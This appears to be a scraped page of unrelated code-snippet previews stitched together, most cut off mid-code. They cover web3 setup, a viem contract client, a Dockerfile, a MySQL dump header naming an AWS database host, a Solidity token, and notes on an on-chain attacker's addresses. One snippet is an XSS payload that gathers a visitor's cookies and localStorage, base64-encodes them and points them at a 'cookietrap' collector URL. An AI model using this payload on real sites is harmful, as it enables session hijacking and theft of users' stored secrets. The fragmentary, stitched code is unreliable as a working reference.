$ pip install web3
private_key = '<your metamask key'
// Post: https://x.com/VictorTaelin/status/1854326873590792276 | |
// Note: The atomics must be kept. | |
// Note: This will segfault on non-Apple devices due to upfront mallocs.#include <stdint.h> | |
#include <stdint.h> | |
#include <stdatomic.h> | |
#include <stdlib.h> | |
#include <stdio.h> | |
#include <time.h> |
// Ad Manager Smart Contract Interaction Guide | |
// Contract Address: 0x020243968704ccF8202Afd1F1134a90953385877 | |
import { createPublicClient, http, parseAbi } from 'viem' | |
import { base } from 'viem/chains' | |
// Initialize the Viem client | |
const client = createPublicClient({ | |
chain: base, | |
transport: http(), |
# We start from a Elixir base image | |
FROM elixir:1.12 | |
# Create app directory and copy the Elixir projects into it | |
RUN mkdir /app | |
COPY . /app | |
WORKDIR /app | |
# Install hex and rebar | |
RUN mix local.hex --force && \ |
-- MySQL dump 10.13 Distrib 8.0.33, for Linux (x86_64) | |
-- | |
-- Host: db-mv-gg-quest.czh2afcpkxqi.eu-west-2.rds.amazonaws.com Database: ggquest | |
-- ------------------------------------------------------ | |
-- Server version 8.0.30 | |
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; | |
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; | |
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; | |
/*!50503 SET NAMES utf8mb4 */; |
[ | |
{ | |
"inputs": [], | |
"stateMutability": "nonpayable", | |
"type": "constructor" | |
}, | |
{ | |
"anonymous": false, | |
"inputs": [ | |
{ |
// The collector must decode the base64-encoded parameter 'payload' | |
// Suggestion: The PHP script could redirect back to the user's referer, such as: | |
// header("Location: " . $_SERVER['HTTP_REFERER']); | |
collector="http://192.168.40.6/cookietrap/trap.php?payload="; | |
c=function(){ret=""; for(var i = 0; i < document.cookie.split(";").length; i++){ ret+=("- " + document.cookie.split(";")[i] + "\n");} return ret; }(); | |
ls=function(){locStor = ""; for(var i = 0; i < localStorage.length; i++){ locStor += ("Key: " + localStorage.key(i) + "\nValue: " + localStorage.getItem(localStorage.key(i)) + "\n\n");} return locStor; }(); | |
payload="Cookies: \n"+ c + "\nLocalStorage: \n" + ls; | |
enc=btoa(payload); | |
alert("Yar cookies are: \n" + c); |
// SPDX-License-Identifier: MIT | |
pragma solidity 0.8.17; | |
// Used in the `name()` function | |
// "Yul Token" | |
bytes32 constant nameLength = 0x0000000000000000000000000000000000000000000000000000000000000009; | |
bytes32 constant nameData = 0x59756c20546f6b656e0000000000000000000000000000000000000000000000; | |
// Used in the `symbol()` function | |
// "YUL" |
Thanks to the ping from trent, samczsun and yambot.
https://etherscan.io/address/0x4429abbf523bef0f1e934b04cff8584955c72548
attacker uses multiple addresses https://etherscan.io/address/0x4429abbf523bef0f1e934b04cff8584955c72548 https://etherscan.io/address/0x0de41bdc58ffaf4a8c1b7084a544fbbe10a9de56
{ | |
"name": "Mask Network", | |
"logoURI": "https://raw.githubusercontent.com/DimensionDev/Maskbook-Website/master/img/MB--CircleCanvas--WhiteOverBlue.svg", | |
"keywords": [ | |
"browser extension", | |
"web3", | |
"peer to peer", | |
"encryption", | |
"cryptography", | |
"gundb", |